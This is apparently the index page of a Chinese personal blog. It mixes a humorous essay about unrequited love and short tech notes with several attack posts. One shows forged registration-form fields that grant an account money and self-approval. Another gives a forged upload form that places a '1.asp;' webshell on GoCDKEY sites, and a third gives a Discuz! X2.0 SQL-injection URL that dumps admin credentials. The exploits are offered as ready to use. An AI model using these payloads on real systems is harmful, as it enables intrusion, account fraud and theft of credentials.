一个备胎的自我修养

作者:admin 发布于:2012-3-1 18:43 Thursday 分类:扯淡类

同学,你有喜欢过一个人吗?

同学,你有喜欢过一个人到愿意为她做任何事吗?

同学,你喜欢的那个人虽然没有接受你,但是知道你的心意吗?

同学,就算那个人没有接受你,你依然心甘情愿鞍前马后,苦苦等候那或许会有的一线希望吗?

如果对以上四个问题你的答案都是“yes”,那么同学,欢迎你成为备胎大军的一员。

你知道什么叫备胎,对吧?是的,就是挂在汽车背后,可能一辈子也用不到的那个圆圈状的玩意儿,大部分情况下,它都会默默地挂在那里,等待几千分之一的机会,有个倒霉的轮子兄弟出事了,于是它就能派上用场了……
而有这么一些兄弟(以及少部分的姐妹),他们大概上辈子是折翼的备胎天使转世,钟爱于感情的备胎事业,他们能做的就是在目标周围展示自己的存在,并且——默默的等。我们不知道是谁给这种杯具身份安上“备胎”的外号,但我必须要说,这个定义真是太TM的合适了!

是的,你是备胎。你或许有用上的一天,但你依然是个备胎。

别随便给自己抹上悲壮的色彩,我们都知道备胎的命运是什么。

请记住,绝大多数备胎——我说的是汽车上悬挂那种——备用期只有四年,四年之后就算没用过也要换。
而那些极少数有幸被使用的备胎,一般也都只有一次短暂的使用机会,用过之后就要及时更换正式轮胎。没错,备胎永远不能变成正式轮胎。

你觉得你以人类的身份当备胎,命运会比这些橡胶圆圈更好吗?别扯淡了。来看看你任劳任怨挂在汽车屁股上的时候都做了什么吧!
有没有告诉自己“只要肯等,我一定有机会的”?有木有,有木有?

别这样,朋友,你只对自己催眠有什么意义吗?别人的恋人是一个又一个的换啊,有考虑过你吗?你有哪怕一次,是从车屁股上取下来打算装上去试试车的吗?
朋友,你知道为什么那家伙始终不肯用你吗?你真以为是像她(鉴于男性读者较多,以下一律用“她”指代对方,女性读者可自行在脑内转换成“他”——当然我估计有少部分不用换?)说的那样“我害怕损害我们的感情”?快醒醒!人家说恋爱中的人智商会直线下滑,可你没恋爱啊,你只是备胎啊,怎么大脑也停止思考了?!

让我来告诉你为什么你不能转正——就是因为你在等!因为有你这样的傻瓜一直在等,所以那家伙觉得自己始终是安全的啊,始终有后路啊,亏得有你不离不弃,那家伙才能信心满满的周旋于每一任情人之间,反正“最坏情况也有人垫背”嘛!
但是!你不要以为那家伙真的会沦落到最后找你买单!你就是最后的保险绳,是备用的保障手段,换句话说,只要没有山穷水尽,你就只能“备用”——但这是个死循环,因为有你在“备用”,所以那家伙永远不会山穷水尽!所以归根结底就是,你永远没有机会!
没有在她的现任恋人面前露出笑脸,还跟人握手,说你是她的朋友?有没有,有没有?

你觉得自己很风度是吧?也没让那家伙丢脸是吧?觉得自己这样忍辱负重好伟大,那家伙一定会感动,会感谢你是吧?
没错儿,那家伙是会感谢你——唯一感谢你的地方,就是感谢你没有挑拨他们的关系,让他们可以继续甜蜜的在一起!

你在拍言情剧吗?!拜托,这种剧情就算放在最烂俗的电视台最烂俗的频道最烂俗的时间段都不会有收视率的好不好!你到底清不清楚自己的立场?还是说你已经强迫自己洗脑到了连自己都相信的地步?你真的没想法是吧?你真的当“普通朋友”当得很开心是吧?那你就不要转过身的时候咬牙啊!

搞明白那家伙需要你,信任你的原因!就是因为你老实到不会坏她好事!感谢你和她一起营造出一个纯情的环境,让她能够和爱她的人一起安心度过……当然你比我更清楚,那个和她在一起的人不是你,而且这个人能和她在一起,很大程度上拜你所赐,你简直就是佛祖。
我说,你这么慈悲为怀不如借我一百万怎么样?我会视心情在本世纪内还你的

有没有深夜接到她的电话,听她带着哭腔说对男友的种种不满,你要听三个小时,安慰三个小时,直到天亮?有没有,有没有?

你是不是觉得她特信任你?是不是觉得自己找到了存在的价值?是不是因为她苦恼寂寞的时候想起的是你,觉得特开心?是不是觉得她和男友的关系出现了微妙的裂痕,自己说不定有机会转正?

对不起,你走错攻略路线了!或许我该恭喜你,因为你在她心目中确实有位置,但很不幸的是,这个位置存放的地方不对!你以为自己有希望当她男友,其实你已经当了她的姐妹,比亲人还亲!正常人会和自己的亲人交往吗?当然不会!是的,她也不会!

必须承认,这种时候你的作用还是很重要的,在这一刻,你简直就不是个备胎,你已经升华成了……补胎工具!是的,如果没有你这样的存在,说不定那个正式轮胎就真的不能用了,她必须换新胎,但现在你在这里,多亏有你,她发泄出了不满、痛苦与郁闷,平复了心情,然后可以重新带着笑脸和豁达的心情去继续与男友卿卿我我,补好的轮胎虽然不如新胎,但至少也可以用嘛。

当然,也有补胎工具不顶用的时候,一般是那个轮胎太破,破到失去了修复的价值,连补胎工具也不行了,这时候当然就会换新胎,于是很快,新胎来了,装好继续上路了,而你,当然继续在旁边看啦——你问为什么不是你上位?多新鲜啊,你不是已经变成补胎工具了吗?有谁会把补胎工具当轮胎使的?你分不清角色,人家可是分得很清楚哦!
别用委屈的眼神看我,看我也没有用,你是自觉自愿主动挂到车屁股上去的——是的,这点很重要,她从来没有强迫你,你从理论上是完全自由的,所以她无视你无视得理直气壮!你看你干得多棒啊,不但为她解除后顾之忧,连道德上的顾虑也帮她解除了!
你觉得你其实没有那么笨?

那么是谁接到她电话就丢下手头的事情飞奔出门?
是谁心甘情愿替她手里的大包小包买单?
是谁乐不滋滋地为她修电脑以方便她和男友视频?
是谁开着自己的车兴高采烈载她到处玩?
是谁拍着胸口为她解决各种乱七八糟的麻烦?
是谁在她男友来的时候自觉自愿退到一边?

你为她做的一切,简直是尽心尽力,惊天地泣鬼神,就算是偶像剧里的男朋友都不可能比你做得更好,但是你居然连她的男朋友都不是!更杯具的是她是有男朋友的!

所以有时候我真的很好奇,为什么会有这么多人,兢兢业业地帮人履行男朋友的种种义务,而且不求回报?难道这个社会已经道德高尚到这个地步了,还是说——你就是在自欺欺人?

所有的迹象都表明你没希望的时候,你还是不肯相信,我理解你,备胎都是这样的。只要她给你一点点疑似的机会,你就跑得比谁都快,那势头简直就像丧尸扑向活人,路上一切阻拦都要被你撕碎,全然不顾最后自己的下场是被一枪爆头。
当然,有些时候,备胎是会尝到一点甜头的。反正备胎要求的不多,陪她出去散心,得到她的一个笑容一句感谢就能觉得自己high了,但是,就此觉得自己已经摆脱了备胎宿命,以正式轮胎的身份大踏步朝着光明的终点滚动,那就纯粹是幻觉了。

我知道你不相信——你当然不愿意相信,“她都在身边了,为什么还说我是备胎?”

别怀疑,你就是。

如果她一直不肯给你介绍她的家人朋友,那你就是。
如果她跟你说“早点遇到你就好了”,那你就是。
如果她和你出去玩的地方不是KTV就是夜店,那你就是。
如果她一直不肯公开和你恋爱关系,那你就是。
如果她和你吃饭从来不去路边摊,那你就是。
如果她从不让你看她的手机来电和短信,从来不让你看她的QQ聊天记录,那你就是。
如果她跟你说她对现任男友有多不满有多迷茫,那你就是。
如果她说要是到了多少岁还在如何就来找你,那你就是。
如果她的QQ空间在和你交往后反而加密码了,那你就是。
如果她总是很忙,总是说自己有加不完的班忙不完的应酬而你觉得有问题,那你就是。
如果你想接近她总不可得,但你想放弃时她又黏上来,那你就是。

……其实我相信不必我继续列下去,因为你们都很清楚自己是备胎,区别只在承认这一点与否。

而要如何摆脱备胎的剧情呢?答案是没有。所有的一切都是因为你爱她,所有的枷锁都是你自己套上去,她给你的饵甚至没有加倒钩,而她过去不会,现在不会,将来也不会将你列入有发展可能的名单。所以想不做备胎,只有一条路可走。

放弃一切不切实际的幻想,扭头走人!

评论(0) 引用(0) 浏览(81)

VB两种发包组建WebBrowser And Inet And XMLHTTP发包

作者:admin 发布于:2011-12-21 10:20 Wednesday 分类:语言类

之前写表单get全部是WebBrowser,有post了因为WebBrowser send实现对一些环境测试不稳定,所有用Inet.Execute。。但好多用户反映会卡。。

WebBrowser get:

WebBrowser1.Navigate "http://www.p-ye.cn/piaoye.html?id=888"

Inet post :

Inet1.Execute "http://www.p-ye.cn/piaoye.html", "POST", "id= 888 ", "Content-Type: application/x-www-form-urlencoded" & vbCrLf

得声明header头编码啥的。,但有时候接收数据也乱码。。。

 

最近用了XMLHTTP写了个小工具,用户反映速度还行。第一次用ms XMLHTTP组建。

Set piaoye = CreateObject("Microsoft.XMLHTTP")

   postdata = "phone=" & Text1.Text & ""

   piaoye.Open "post", "http://www.p-ye.cn/piaoye.html", False

   piaoye.setRequestHeader "Content-Length", Len(postdata)

   piaoye.setRequestHeader "CONTENT-TYPE", "application/x-www-form-urlencoded"

   piaoye.send postdata


标签: WebBrowser Inet XMLHTTP

评论(0) 引用(0) 浏览(198)

表单注入之篇,懒程序员的带来的影响

作者:admin 发布于:2011-12-11 17:02 Sunday

by:piaoye
今天看了个源码,大概是这样的:[code].....
rs.Open .....
rs.Addnew
putallrs(rs)  //*  这里,但看到这块惊讶了。putallrs东西一下子把表单所有信息全部插入到字段了,而不用一行行XX = RS这样写。但搜索下asp没这个内置函数 
rs.Update
.......
[/code]这段是注册时提交程序。

翻了下,是自定义的:[code]function PutAllRs(this_rs)
 for i=1 to this_rs.Fields.Count-1
  fieldname=this_rs.Fields(i).name
  fieldtype=this_rs.Fields(i).type
  tmp_str=request.form(fieldname)  //*  什么都没过滤
 if tmp_str<>"" then
  if fieldtype=3 then
   if isnumeric(tmp_str) then
   this_rs(fieldname)=tmp_str
   else
   this_rs(fieldname)=0
   end if        
  elseif fieldtype=105 then
  if isdate(tmp_str) then
  this_rs(fieldname)=cdate(tmp_str)
  end if
  else
  this_rs(fieldname)=tmp_str
  end if        
 end if        
 next        
end function[/code].循环rs...不是重点。。。
是个会员管理程序,所有会员信息全部存在一个表内,例:会员money等....  获取表单数据时没有过滤。那么导致一个什么情况那?

完全可以伪造表单提交数据上去,说吧注册表单本地化,在表单内增加[code]<input name="money" value="888"/>[/code]并注册,但提示需要管理审核才能通过。

在翻了下程序,控制审核的字段也在会员表内,数据库默认为0,1为审核通过。

再次增加[code]<input name="safe" value="1"/>[/code]注册成功。帐户金额888元,可提现...

下来谷歌一把,用的站很多,但发现一些系统可能被修复了,本地表单注册时提示禁止外部提交。
不甘心,其实也想到是否修改主机头下能通过...想起没有任何过滤,那么也不需要本地伪造了。

会员注册时有个详细地址栏,这个够插入了。[code]<textarea name="addres"></textarea>[/code][font=monospace][size=3][color=#000000]
[/color][/size][/font][code]</textarea><input name="money" value="888"/><input name="safe" value="1"/><textarea>[/code][font=monospace][size=3][color=#000000]
[/color][/size][/font]
[font=monospace][size=3][color=#000000]这样就变成了[/color][/size][/font][code]<textarea name="addres"></textarea><input name="money" value="888"/><input name="safe" value="1"/><textarea></textarea>// *也可以直接注释了[/code][font=monospace][size=3][color=#000000]再次提交,注册成功!但会员信息页面被拉了个框,成了包含式了。[/color][/size][/font]
[font=monospace][size=3][color=#000000]
[/color][/size][/font]
[font=monospace][size=3][color=#000000]编辑会员信息,这一栏写 ' 注释提交,消失。[/color][/size][/font]

总结:数据没有过滤,trim htmlencode等,会员信息和帐户敏感信息可分开表存放,新增记录针对类型分开获取。

评论(0) 引用(0) 浏览(210)

GoCDKEY游戏推广系统上传漏洞

作者:admin 发布于:2011-12-11 17:01 Sunday 分类:语言类

因需要下了源码看了下 
出现在\inc\img_save.asp 文件[code]....省略一千万行....
set fs=server.CreateObject("scripting.filesystemobject")
set upload=new upload_5xSoft ''建立上传对象
'--------将日期转化成文件名--------
formPath="/uploadfile/" 
formpath2=upload.form("type")  //* BUG出现在这里,type值 从from获得 自定义路径
formPath=formPath&formPath2 //*路径生成。。。。uploadfile+type
if upload.form("adsrc")="" then  
adsrc="ADSrc"
else
adsrc=upload.form("adsrc")
end if
 ''在目录后加(/)
 if right(formPath,1)<>"/" then formPath=formPath&"/" 
set file=upload.file("picture") ''生成一个文件对象
if file.FileSize>0 then ''如果 FileSize > 0 说明有文件数据
if file.filesize>300000 then
response.write"<SCRIPT language=JavaScript>alert('上传图片大于规定(300K),请改变文件大小后重新上传!');"
response.write"javascript:history.back(-1)</SCRIPT>"
response.end
end if
FileExt        = Mid(file.Filename, InStrRev(file.Filename, ".")+1)
FileExt        = FixName(FileExt)
If Not ( CheckFileExt(FileExt) ) Then
response.write"<SCRIPT language=JavaScript>alert('上传图片只支持 gif|jpg|jpeg|bmp|png 图象文件!');"
response.write"javascript:history.back(-1)</SCRIPT>"
response.end
end if

thename=MakedownName()&"."&FileExt
'开始判断会员图片目录是否存在
  Set objFSO = Server.CreateObject("Scripting.FileSystemObject")
    If objFSO.FolderExists(Server.MapPath(""&formPath&"")) Then'如果存在就直接保存图片
  file.SaveAs Server.mappath(formPath&thename)
  Else
  objFSO.CreateFolder(Server.MapPath(""&formPath&""))'不存在就建一个目录
  file.SaveAs Server.mappath(formPath&thename)
  
  Set Jpeg = Server.CreateObject("Persits.Jpeg") '调用组件 
Path = Server.MapPath(formPath&thename) '待处理图片路径 
Jpeg.Open Path 
If Jpeg.OriginalWidth / Jpeg.OriginalHeight > 1 then 
Jpeg.Width = 350
Jpeg.Height = int((350/Jpeg.OriginalWidth)*Jpeg.OriginalHeight) 
elseif Jpeg.OriginalWidth / Jpeg.OriginalHeight < 1 then 
Jpeg.Height = 350
Jpeg.Width= int(Jpeg.OriginalWidth*(350/Jpeg.Height)) 
end if

Jpeg.Save Server.MapPath(formPath&thename)

  End If
  Set objFSO = Nothing      '释放 FileSystemObject 对象实例内存空间
imgs=thename
else
response.write"<SCRIPT language=JavaScript>alert('上传文件为空或文件太大!');"
response.write"javascript:history.back(-1)</SCRIPT>"
response.end
end if

%>
<script>
//alert("上传图片成功")
var random = Math.random();
window.opener.document.Form1.<%=adsrc%>.value="<%=formpath%><%=imgs%>";  //* 返回路径、文件名路径
....省略一千万行....[/code]下来伪造表单提交图片马[code]<FORM name=formuppic action=http://www.xxxx.com/inc/img_save.asp method=post encType=multipart/form-data>
   <input type="hidden" name="adsrc" value="1.asp;"><input type="hidden" name="type" value="1.asp;"> 
   <TBODY> 
        <TR> 
          <TD>上传文件: 
    <input type=file name="picture"> <INPUT style="FONT-SIZE: 9pt" type=submit value="确 定" name=submit> 
          </TD> 
        </TR> 
      </TBODY>  </FORM>[/code]上传后会得到地址:[color=#000][font=monospace]window.opener.document.Form1.1.asp;.value="/uploadfile/1.asp;/2011111990914.jpg";[/font][/color]
[font=monospace][size=3][color=#000000]
[/color][/size][/font]

评论(0) 引用(0) 浏览(151)

php采集/小偷程序

作者:admin 发布于:2011-9-11 16:20 Sunday 分类:语言类

20小时读一次目标的站,可以自己修改,看下就明白怎么弄其他站了,很简单的
chuanqi.php //私服小偷
以下为引用的内容:
<?
extract($_GET);extract($_POST);
$clinchurl= "http://www.haosf.com"; //目标站
$url = $clinchurl.$domain;
$fp=@fopen($url,"r&...

阅读全文>>

标签: php采集 小偷 程序 PHP

评论(0) 引用(0) 浏览(235)

如何查看mysql运行、访问记录等日志

作者:admin 发布于:2011-8-29 4:35 Monday 分类:语言类

 

1.首先确认你日志是否启用了

mysql > show variables like  ' log_bin ' ;


2.如果启用了,即ON
那日志文件就在mysql的安装目录的data目录下
3.怎样知道当前的日志


mysql >  show master status;

 

4.看二进制日志文件用mysqlbinlo...

阅读全文>>

评论(114) 引用(0) 浏览(8709)

sql server2000 安装出错问题

作者:admin 发布于:2011-8-18 11:20 Thursday 分类:语言类

什么sql 2000 [Microsoft][ODBC 驱动程序管理器] 未发现数据源 28000 HY000 错误,fuck。折腾死人。

服务器因为中过毒,系统乱七八糟,也不好远程还原,机房MD不给处理。放哪里几年都没用,今天折腾了一天sql装不上。一个个问题排除,重装,重启,折腾了半死。

最后是数据源问题导致。。。

最终解决方法:

自己电脑拷了俩sqlsrv32.dll和sqlsrv32.rll文件传...

阅读全文>>

评论(10) 引用(0) 浏览(409)

阿里云手机全球首发现场直播

作者:admin 发布于:2011-7-28 13:38 Thursday 分类:扯淡类

当阻挡人类沟通的壁垒消失在无边的云际,当浩如烟海的信息被人们随时收纳入袋、如影随形,当我们在这个星球的任何角落随时悦享千里之外的精彩——阿里云.云OS 终于将在7月28日揭开她神秘的面纱,展露出她那迷人的脸庞。1095个日夜不停的勤耕不辍、37个专项项目组的攻坚研发、10007张设计图的修改迭代、数千台服务器集群的稳定基石……承载了1400名阿云...

阅读全文>>

评论(22) 引用(0) 浏览(632)

不用翻墙访问Twitter与YouTube

作者:admin 发布于:2011-7-27 12:21 Wednesday 分类:语言类

 

hosts 添加如下记录即可!或者下载附件覆盖到C:\WINDOWS\system32\drivers\etc\ 下。

203.208.46.29 youtube.com

203.208.46.29 www.youtube.com

203.208.46.29 gdata.youtube.com

203.208.46.29 m.youtube.com

203.208.46.29 he...

阅读全文>>

标签: hosts 不用翻墙

评论(1) 引用(0) 浏览(250)

Discuz! X2.0 SQL注入漏洞 EXP

作者:admin 发布于:2011-6-29 13:37 Wednesday 分类:语言类

 

DZ2.0直接暴管理账号密码(默认前缀的情况下)

/forum.php?mod=attachment&findpost=ss&aid=MScgYW5kIDE9MiB1bmlvbiBhbGwgc2V
sZWN0IDEsZ3JvdXBfY29uY2F0KHVzZXJuYW1lLDB4N0MzMjc0NzQ3QyxwYXNzd
29yZCkgZnJvbSBwcmVfY29tbW9u...

阅读全文>>

标签: Discuz! X2.0

评论(22) 引用(0) 浏览(903)

Powered by emlog